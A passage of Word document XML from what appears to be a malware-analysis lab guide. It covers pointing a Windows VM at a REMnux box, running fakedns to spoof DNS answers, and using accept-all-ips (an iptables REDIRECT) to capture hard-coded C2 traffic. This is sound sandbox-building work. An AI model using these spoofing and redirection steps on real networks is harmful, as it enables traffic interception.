        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="002D7572">
        <w:t xml:space="preserve">ote the IP address, because this will be the </w:t>
      </w:r>
      <w:r w:rsidRPr="00711FD6">
        <w:t>gateway</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00711FD6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>As well, note the</w:t>
      </w:r>
      <w:r w:rsidRPr="00711FD6">
        <w:t xml:space="preserve"> DNS address for the Windows</w:t>
      </w:r>
      <w:r w:rsidR="002D7572">
        <w:t xml:space="preserve"> analysis environment machine.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D7572">
        <w:t>Set your Windows anal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ysis machine on the same vmnet. </w:t>
      </w:r>
      <w:r w:rsidR="00BA760C">
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidR="00BA760C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Your IP addressing scheme MAY be different from this example, please consult your machines accordingly*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A1A600" w14:textId="300871F9" w:rsidR="002D7572" w:rsidRDefault="00711FD6" w:rsidP="000B54DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="002D7572">
        <w:t xml:space="preserve">tart </w:t>
      </w:r>
      <w:r>
        <w:t>your Windows analysis machine</w:t>
      </w:r>
      <w:r w:rsidR="002D7572">
        <w:t xml:space="preserve"> and note its assigned IP address and interface name using </w:t>
      </w:r>
      <w:r w:rsidR="002D7572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>netsh</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296A218D" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="00711FD6" w:rsidRDefault="002D7572" w:rsidP="00711FD6">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&gt; netsh interface ipv4 show config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6795D6A4" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="00711FD6" w:rsidRDefault="002D7572" w:rsidP="00711FD6">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Configuration for interface "Local Area Connection"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A584929" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="00711FD6" w:rsidRDefault="002D7572" w:rsidP="00711FD6">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    DHCP enabled:                         Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FBA634" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="00711FD6" w:rsidRDefault="002D7572" w:rsidP="00711FD6">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IP Address:                           192.168.118.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C23D98D" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="00711FD6" w:rsidRDefault="002D7572" w:rsidP="00711FD6">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    Subnet Prefix:                        192.168.118.0/24 (mask 255.255.255.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065DED10" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="00711FD6" w:rsidRDefault="002D7572" w:rsidP="00711FD6">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    InterfaceMetric:                      10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5C3595" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="00711FD6" w:rsidRDefault="002D7572" w:rsidP="00711FD6">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    DNS servers configured through DHCP:  192.168.118.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58808CDD" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="00711FD6" w:rsidRDefault="002D7572" w:rsidP="00711FD6">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    Register with which suffix:           Primary only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A8DE2A" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="00711FD6" w:rsidRDefault="002D7572" w:rsidP="00711FD6">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WINS servers configured through DHCP: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275FCFF8" w14:textId="770A34C8" w:rsidR="002D7572" w:rsidRDefault="002D7572" w:rsidP="000B54DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set your </w:t>
      </w:r>
      <w:r w:rsidR="00711FD6">
        <w:t>REMnux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> machine as the default gateway, and use the DHCP assigned address as your new static address using </w:t>
      </w:r>
      <w:r w:rsidRPr="00D14C4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>netsh</w:t>
      </w:r>
      <w:r w:rsidR="00CD1ECD" w:rsidRPr="00CD1ECD">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BA275A" w14:textId="77777777" w:rsidR="002D7572" w:rsidRPr="00711FD6" w:rsidRDefault="002D7572" w:rsidP="00711FD6">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&gt;netsh interface ipv4 set address name="Local Area Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D845B64" w14:textId="683C947B" w:rsidR="002D7572" w:rsidRPr="00711FD6" w:rsidRDefault="002D7572" w:rsidP="00711FD6">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>" static [</w:t>
      </w:r>
      <w:r w:rsidR="00BA760C">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>IP Address] [Net Mask] [</w:t>
      </w:r>
      <w:r w:rsidR="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>REMnux</w:t>
      </w:r>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP/Gateway]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A13EA8F" w14:textId="31C114A0" w:rsidR="00CD2ABB" w:rsidRDefault="00CD2ABB" w:rsidP="00BC5DCE">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0A8D27" w14:textId="783AE196" w:rsidR="009E5F26" w:rsidRDefault="009E5F26" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="540" w:hanging="540"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc24514472"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00711FD6">
        <w:t>DNS Spoofing Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="526A040C" w14:textId="77777777" w:rsidR="00711FD6" w:rsidRDefault="00711FD6" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To set REMnux as your local DNS server, you need to respond to DNS requests. REMnux contains a tool called “fakedns,” which is simply a Python script that responds to DNS A record requests with the IP address of the current host or a designated IP address on port 53. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E35F3D3" w14:textId="6A20A08C" w:rsidR="00711FD6" w:rsidRDefault="00711FD6" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Invoke it by calling </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7C61">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>fakedns</w:t>
      </w:r>
      <w:r w:rsidR="008C05FF">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D790E3" w14:textId="4C58B351" w:rsidR="00711FD6" w:rsidRPr="00711FD6" w:rsidRDefault="00711FD6" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>REMnux</w:t>
      </w:r>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>REMnux</w:t>
      </w:r>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:~$ fakedns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DE26E3" w14:textId="77777777" w:rsidR="00711FD6" w:rsidRPr="00711FD6" w:rsidRDefault="00711FD6" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pyminifakeDNS:: dom.query. 60 IN A 192.168.118.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2386A4D0" w14:textId="10B0860A" w:rsidR="00711FD6" w:rsidRDefault="00711FD6" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Now that requests are being responded to, set machine as your DNS server</w:t>
      </w:r>
      <w:r w:rsidR="006A0488">
        <w:t xml:space="preserve"> on your Windows machine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="00C273CD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>netsh</w:t>
      </w:r>
      <w:r w:rsidR="008C05FF">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D8AF0" w14:textId="77777777" w:rsidR="00711FD6" w:rsidRPr="00711FD6" w:rsidRDefault="00711FD6" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&gt;netsh interface ipv4 set dns name="Local Area Connection" st</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28780F0D" w14:textId="24DD66DC" w:rsidR="00711FD6" w:rsidRPr="00711FD6" w:rsidRDefault="00711FD6" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>atic [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>REMnux</w:t>
      </w:r>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E634ED" w14:textId="7C6C3A11" w:rsidR="00711FD6" w:rsidRDefault="00711FD6" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Windows test</w:t>
      </w:r>
      <w:r w:rsidR="008C05FF">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the DNS connection by sending a request for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD3382">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>www.microsoft.com</w:t>
      </w:r>
      <w:r w:rsidR="008C05FF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>, t</w:t>
      </w:r>
      <w:r w:rsidRPr="007D626B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="007D626B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D626B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> fakedns</w:t>
      </w:r>
      <w:r w:rsidRPr="007D626B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D626B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>respond</w:t>
      </w:r>
      <w:r w:rsidR="008C05FF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the command succeed</w:t>
      </w:r>
      <w:r w:rsidR="00CD1ECD">
        <w:t>s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A891B59" w14:textId="77777777" w:rsidR="00711FD6" w:rsidRPr="00711FD6" w:rsidRDefault="00711FD6" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Respuesta: www.microsoft.com. -&gt; 192.168.118.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EB0877" w14:textId="4ED4F5C4" w:rsidR="00711FD6" w:rsidRDefault="008C05FF" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00711FD6">
        <w:t>erify that DNS requests are now being spoofed by attemptin</w:t>
      </w:r>
      <w:r w:rsidR="00CD1ECD">
        <w:t>g to ping a non-existent domain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB07C9F" w14:textId="77777777" w:rsidR="00711FD6" w:rsidRPr="00711FD6" w:rsidRDefault="00711FD6" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&gt;ping negjknerjkgnekjgn.ergnekgrn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA9ACDD" w14:textId="77777777" w:rsidR="00711FD6" w:rsidRPr="00711FD6" w:rsidRDefault="00711FD6" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Pinging negjknerjkgnekjgn.ergnekgrn [192.168.118.132] with 32 bytes of data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0459709B" w14:textId="77777777" w:rsidR="00711FD6" w:rsidRPr="00711FD6" w:rsidRDefault="00711FD6" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711FD6">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Reply from 192.168.118.132: bytes=32 time&lt;1ms TTL=64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D7DF4" w14:textId="0C913520" w:rsidR="009A3E1C" w:rsidRDefault="009A3E1C" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="540" w:hanging="540"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc24514473"/>
      <w:r>
        <w:t>1.3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008C05FF">
        <w:t>IP Address Spoofing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="51FFF1E6" w14:textId="179B78B9" w:rsidR="008C05FF" w:rsidRDefault="008C05FF" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Malware use</w:t>
      </w:r>
      <w:r w:rsidR="00A63D66">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hard-coded IP addresses for command and control. To intercept these, use a shell script</w:t>
      </w:r>
      <w:r w:rsidR="00A63D66">
        <w:t xml:space="preserve"> that is built in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to REMnux called “accept-all-ips.” This script configures all traffic on a given interface to redirect to the REMnux IP address using </w:t>
      </w:r>
      <w:r w:rsidRPr="000E48D8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:r w:rsidR="006A0488">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006A0488" w:rsidRPr="005D32D8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The following command does not require you to input it into your workstation, it’s simply an example of what the REMnux script is doing behind the scenes.</w:t>
      </w:r>
      <w:r w:rsidR="006A0488">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EFEAC1" w14:textId="77777777" w:rsidR="008C05FF" w:rsidRPr="008C05FF" w:rsidRDefault="008C05FF" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C05FF">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sudo iptables -t nat -A PREROUTING -i $INTERFACE -j REDIRECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290DE507" w14:textId="5426751F" w:rsidR="008C05FF" w:rsidRDefault="008C05FF" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>This script can be executed as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1517FB23" w14:textId="77777777" w:rsidR="008C05FF" w:rsidRPr="008C05FF" w:rsidRDefault="008C05FF" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C05FF">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>remnux@remnux:~$ accept-all-ips start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540A2D07" w14:textId="77777777" w:rsidR="008C05FF" w:rsidRPr="008C05FF" w:rsidRDefault="008C05FF" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C05FF">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>OK, iptables will accept and redirect connections on all IPs on eth0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256E520B" w14:textId="77777777" w:rsidR="008C05FF" w:rsidRPr="008C05FF" w:rsidRDefault="008C05FF" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C05FF">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Remember to set the client system's default gateway to 192.168.118.132.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A88DE37" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="144E2413" w14:textId="42731DEF" w:rsidR="008C05FF" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>You can v</w:t>
      </w:r>
      <w:r w:rsidR="008C05FF">
        <w:t xml:space="preserve">erify that IP addresses are being redirected by pinging an IP address </w:t>
      </w:r>
      <w:r w:rsidR="006A0488">
        <w:t xml:space="preserve">from your Windows machine </w:t>
      </w:r>
      <w:r w:rsidR="008C05FF">
        <w:t>that should not be reachable from this network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD90B01" w14:textId="77777777" w:rsidR="008C05FF" w:rsidRPr="008C05FF" w:rsidRDefault="008C05FF" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C05FF">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&gt;ping 123.123.123.123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A87F696" w14:textId="77777777" w:rsidR="008C05FF" w:rsidRPr="008C05FF" w:rsidRDefault="008C05FF" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D0BAE6F" w14:textId="77777777" w:rsidR="008C05FF" w:rsidRPr="008C05FF" w:rsidRDefault="008C05FF" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C05FF">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Pinging 123.123.123.123 with 32 bytes of data:</w:t>
      </w:r>
